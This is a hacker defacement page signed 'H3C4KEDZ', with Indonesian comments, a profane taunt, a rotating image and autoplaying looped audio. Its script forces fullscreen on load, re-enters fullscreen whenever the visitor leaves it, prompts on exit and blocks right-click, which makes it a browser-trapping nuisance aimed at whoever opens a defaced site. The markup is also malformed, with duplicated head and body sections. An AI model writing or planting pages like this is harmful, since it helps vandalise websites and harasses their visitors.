<!---Hacker By H3C4KEDZ --->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Song Lyrics</title>
<style>
  /* Style untuk membuat tampilan penuh */
  html, body {
    margin: 0;
    padding: 0;
    width: 100%;
    height: 100%;
    overflow: hidden;
    cursor: none; /* Menyembunyikan kursor */
  }
</style>
</head>
<body>

<!-- Konten halaman web -->
</marquee></font> <br><span class="blink_me"><font size="5" color="Green" face="Wallpoet" style="text-shadow: 5px 0px 27px red;">Fcuk You 🗿 <br> </a></font></span></b>
  <style>  
  /* Style untuk bunga */
  #bunga {
    position: fixed;
    top: 50%;
    left: 50%;
    width: 100px;
    height: auto;
    transform: translate(-50%, -50%);
    animation: melayang 5s linear infinite;
  }
  
  /* Animasi untuk melayang */
  @keyframes melayang {
    0% {
      transform: translate(-50%, -50%) rotate(0deg);
    }
    50% {
      transform: translate(-50%, -50%) rotate(20deg);
    }
    100% {
      transform: translate(-50%, -50%) rotate(0deg);
    }
  }
</style>
</head>
<body>

<!-- Gambar bunga -->
<img id="bunga" src="20240719_180810.png" alt="Error">

<script>
  // Fungsi untuk menangkap event keluar dari halaman
  window.onbeforeunload = function() {
    return "Apakah Anda yakin ingin meninggalkan halaman ini?";
  };

  // Fungsi untuk menangkap event ketika mencoba untuk keluar dari tampilan penuh
  window.addEventListener("fullscreenchange", function() {
    if (!document.fullscreenElement) {
      document.documentElement.requestFullscreen(); // Kembali ke tampilan penuh jika keluar
    }
  });

  // Meminta tampilan penuh saat halaman dimuat
  document.documentElement.requestFullscreen();

  // Fungsi untuk mencegah klik kanan
  document.addEventListener("contextmenu", function(e) {
    e.preventDefault();
  });

</script>
  <audio autoplay loop>
  <source src="h8q0sepm.mp3" type="audio/mpeg">
  Your browser does not support the audio element.
  </audio>

</body>
</html>
